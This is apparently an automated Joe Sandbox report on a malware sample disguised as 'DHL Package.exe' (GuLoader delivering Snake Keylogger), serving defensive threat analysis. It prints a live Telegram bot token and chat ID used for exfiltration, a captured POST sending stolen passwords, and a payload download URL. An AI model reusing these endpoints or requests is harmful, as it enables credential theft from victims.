Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL Package.exe

Overview

General Information

Sample name:DHL Package.exe
Analysis ID:1489281
MD5:ceb0fc229f47b61909ce0e6a68dd191f
SHA1:93862169c62ec357ae869c50e5249fc16bab9cc9
SHA256:4f3ec860e9371f32df06c6d342b6e16bdc8ad4c08aeeaa8f2a66549750805603
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • DHL Package.exe (PID: 9072 cmdline: "C:\Users\user\Desktop\DHL Package.exe" MD5: CEB0FC229F47B61909CE0E6A68DD191F)
    • DHL Package.exe (PID: 4252 cmdline: "C:\Users\user\Desktop\DHL Package.exe" MD5: CEB0FC229F47B61909CE0E6A68DD191F)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7197950156:AAHyWbH8kpjv0OHg9kyjLK-uVhbdlEhq_ZQ/sendMessage?chat_id=6873631044"}
{"C2 url": "https://api.telegram.org/bot7197950156:AAHyWbH8kpjv0OHg9kyjLK-uVhbdlEhq_ZQ/sendMessage"}
SourceRuleDescriptionAuthorStrings
0000000C.00000002.6270895609.0000000037035000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    0000000C.00000002.6270895609.000000003710E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          0000000C.00000002.6270895609.0000000036EA1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            Click to see the 4 entries
            No Sigma rule has matched
            Timestamp:2024-08-07T09:28:23.238618+0200
            SID:2803274
            Severity:2
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-08-07T09:28:34.383581+0200
            SID:2853006
            Severity:1
            Source Port:49750
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-07T09:28:18.208911+0200
            SID:2803274
            Severity:2
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-08-07T09:28:21.129680+0200
            SID:2803274
            Severity:2
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-08-07T09:28:26.441063+0200
            SID:2803274
            Severity:2
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-08-07T09:28:22.862325+0200
            SID:2803305
            Severity:3
            Source Port:49745
            Destination Port:443
            Protocol:TCP
            Classtype:Unknown Traffic
            Timestamp:2024-08-07T09:28:20.067426+0200
            SID:2803274
            Severity:2
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-08-07T09:28:24.316459+0200
            SID:2803274
            Severity:2
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-08-07T09:28:21.807309+0200
            SID:2803305
            Severity:3
            Source Port:49744
            Destination Port:443
            Protocol:TCP
            Classtype:Unknown Traffic
            Timestamp:2024-08-07T09:28:26.060314+0200
            SID:2803305
            Severity:3
            Source Port:49748
            Destination Port:443
            Protocol:TCP
            Classtype:Unknown Traffic
            Timestamp:2024-08-07T09:28:23.929722+0200
            SID:2803305
            Severity:3
            Source Port:49746
            Destination Port:443
            Protocol:TCP
            Classtype:Unknown Traffic
            Timestamp:2024-08-07T09:28:24.986734+0200
            SID:2803305
            Severity:3
            Source Port:49747
            Destination Port:443
            Protocol:TCP
            Classtype:Unknown Traffic
            Timestamp:2024-08-07T09:28:20.751723+0200
            SID:2803305
            Severity:3
            Source Port:49743
            Destination Port:443
            Protocol:TCP
            Classtype:Unknown Traffic
            Timestamp:2024-08-07T09:28:22.191952+0200
            SID:2803274
            Severity:2
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-08-07T09:28:15.598712+0200
            SID:2803270
            Severity:2
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-08-07T09:28:27.118767+0200
            SID:2803305
            Severity:3
            Source Port:49749
            Destination Port:443
            Protocol:TCP
            Classtype:Unknown Traffic
            Timestamp:2024-08-07T09:28:25.394377+0200
            SID:2803274
            Severity:2
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:Potentially Bad Traffic

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 0000000C.00000002.6270895609.0000000036EA1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7197950156:AAHyWbH8kpjv0OHg9kyjLK-uVhbdlEhq_ZQ/sendMessage?chat_id=6873631044"}
            Source: DHL Package.exe.4252.12.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7197950156:AAHyWbH8kpjv0OHg9kyjLK-uVhbdlEhq_ZQ/sendMessage"}
            Source: DHL Package.exeVirustotal: Detection: 15%Perma Link

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: DHL Package.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.11.20:49742 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49750 version: TLS 1.2
            Source: DHL Package.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 0_2_00406739 FindFirstFileW,FindClose,0_2_00406739
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 0_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AED
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_00402902 FindFirstFileW,12_2_00402902
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_00406739 FindFirstFileW,FindClose,12_2_00406739
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_00405AED
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 0015F00Eh12_2_0015EE21
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 0015F998h12_2_0015EE21
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_0015E340
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 0015FDF9h12_2_0015FB39
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 39381011h12_2_39380D60
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393815D8h12_2_393811C0
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 39380BB1h12_2_39380900
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393815D8h12_2_39381506
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 3938E3EFh12_2_3938E148
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 3938E847h12_2_3938E5A0
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 3938EC9Fh12_2_3938E9F8
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393802F1h12_2_39380040
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 39380751h12_2_393804A0
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 3938DF97h12_2_3938DCF0
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 3938F9A7h12_2_3938F700
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 3938FDFFh12_2_3938FB58
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then mov esp, ebp12_2_3938DA58
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 3938F0F7h12_2_3938EE50
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 3938F54Fh12_2_3938F2A8
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393AB043h12_2_393AAD08
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393A8CC7h12_2_393A8A20
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393A7FBFh12_2_393A7D18
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393A32AFh12_2_393A3008
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393A25A7h12_2_393A2300
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393AA2A7h12_2_393AA000
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393A911Fh12_2_393A8E78
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393A8417h12_2_393A8170
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393A3707h12_2_393A3460
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393A29FFh12_2_393A2758
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393AA6FFh12_2_393AA458
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393A1CF7h12_2_393A1A50
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393A99F8h12_2_393A9750
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393A0FEFh12_2_393A0D48
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393A02E7h12_2_393A0040
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]12_2_393A5AB8
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393AAB57h12_2_393AA8B0
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393A2E57h12_2_393A2BB0
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393A214Fh12_2_393A1EA8
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393A9E4Fh12_2_393A9BA8
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393A1447h12_2_393A11A0
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]12_2_393A5AA7
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393A073Fh12_2_393A0498
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393A7B3Fh12_2_393A7898
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393A189Fh12_2_393A15F8
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393A0B97h12_2_393A08F0
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393A9577h12_2_393A92D0
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then jmp 393A886Fh12_2_393A85C8
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]12_2_39AC23FA

            Networking

            barindex
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: POST /bot7197950156:AAHyWbH8kpjv0OHg9kyjLK-uVhbdlEhq_ZQ/sendDocument?chat_id=6873631044&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcb6910375831aHost: api.telegram.orgContent-Length: 582Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 172.67.177.134 172.67.177.134
            Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
            Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /SjZVauFBbad87.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: monteveliz.clCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.11.20:49742 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /SjZVauFBbad87.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: monteveliz.clCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: DHL Package.exe, 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}},"fre":{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"},"hardware_acceleration_mode_previous":true,"is_dsp_recommended":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false},"network_primary_browser":{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}},"network_time":{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="},"policy":{"last_statistics_update":"13335737596278882"},"profile":{"info_cache":{"Default":{"active_time":1691263997.009407,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_20",
            Source: global trafficDNS traffic detected: DNS query: monteveliz.cl
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7197950156:AAHyWbH8kpjv0OHg9kyjLK-uVhbdlEhq_ZQ/sendDocument?chat_id=6873631044&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcb6910375831aHost: api.telegram.orgContent-Length: 582Connection: Keep-Alive
            Source: DHL Package.exe, 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: DHL Package.exe, 0000000C.00000002.6270895609.0000000036F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: DHL Package.exe, 0000000C.00000002.6270895609.0000000037012000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037029000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036FED000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037007000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036FFC000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: DHL Package.exe, 0000000C.00000002.6260987034.0000000006A27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: DHL Package.exe, 0000000C.00000002.6273766004.00000000396C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: DHL Package.exe, 0000000C.00000002.6273766004.00000000396C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: DHL Package.exe, 0000000C.00000002.6260987034.00000000069D8000.00000004.00000020.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6261513905.0000000006CF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://monteveliz.cl/SjZVauFBbad87.bin
            Source: DHL Package.exe, 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmp, DHL Package.exe, 00000000.00000000.1150512237.000000000040A000.00000008.00000001.01000000.00000003.sdmp, DHL Package.exe, 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: DHL Package.exe, 0000000C.00000002.6273766004.00000000396C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
            Source: DHL Package.exe, 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: DHL Package.exe, 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: DHL Package.exe, 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7197950156:AAHyWbH8kpjv0OHg9kyjLK-uVhbdlEhq_ZQ/sendDocument?chat_id=6873
            Source: DHL Package.exe, 0000000C.00000002.6270895609.000000003708D000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: DHL Package.exe, 0000000C.00000002.6270895609.000000003708D000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6272525391.0000000037F2E000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
            Source: DHL Package.exe, 0000000C.00000002.6270895609.000000003708D000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6272525391.0000000037F2E000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: DHL Package.exe, 0000000C.00000002.6270895609.000000003708D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/lB
